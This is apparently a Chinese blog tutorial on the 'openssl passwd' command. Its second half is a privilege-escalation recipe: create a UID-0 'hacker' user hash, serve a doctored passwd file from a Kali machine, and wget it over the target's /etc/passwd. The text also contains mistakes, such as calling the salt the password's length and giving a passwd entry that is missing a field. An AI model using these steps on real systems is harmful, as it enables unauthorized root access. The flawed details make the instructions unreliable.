参考：https://www.cnblogs.com/liushuhe1990/articles/12298749.html

引言:

在Linux系统中我们要向手动生成一个密码可以采用opensll passwd来生成一个密码作为用户账号的密码。Linux系统中的密码存放在/etc/shadow文件中，并且是以加密的方式存放的，根据加密方式的不同，所产生的加密后的密码的位数也不同。

openssl passwd的作用是用来计算密码hash的，目的是为了防止密码以明文的形式出现。

语法格式：

openssl passwd [option] passwd

openssl passwd常用的选项如下：

-1：表示采用的是MD5加密算法。

-salt：指定salt值，不使用随机产生的salt。在使用加密算法进行加密时，即使密码一样，salt不一样，所计算出来的hash值也不一样，除非密码一样，salt值也一样，计算出来的hash值才一样。salt为8字节的字符串。

示例：

[tom@localhost ~]$ openssl passwd -1 -salt ‘12345678’ ##注意‘12345678’不是密码而是密码的长度

Password: ##这里输入的是密码

$1$12345678$1qWiC4czIc07B4J8bPjfC0 ##这是生成的密文密码

##将生成的密码串，手动添加到/etc/shadow中就可用作用户的登陆密码了。

passwd提权

1.通过OpenSSL passwd生成一个新的用户hacker，密码为123456

openssl passwd -1 -salt hacker 123456

$1$hacker$4o50Z4aoUGaLMC0Rg4Io40

2.将其追加到kali的/etc/passwd文件中

将hacker:$1$hacker$4o50Z4aoUGaLMC0Rg4Io40:0:0:/root:/bin/bash追加到passwd中

3.在Kali上启动一个python服务器

python -m SimpleHTTPServer 8000

4.将Kali上的passwd文件下载到靶机etc目录下并覆盖原来的passwd文件

wget http://192.168.0.1/passwd -O /etc/passwd

5.然后切换到hacker用户即可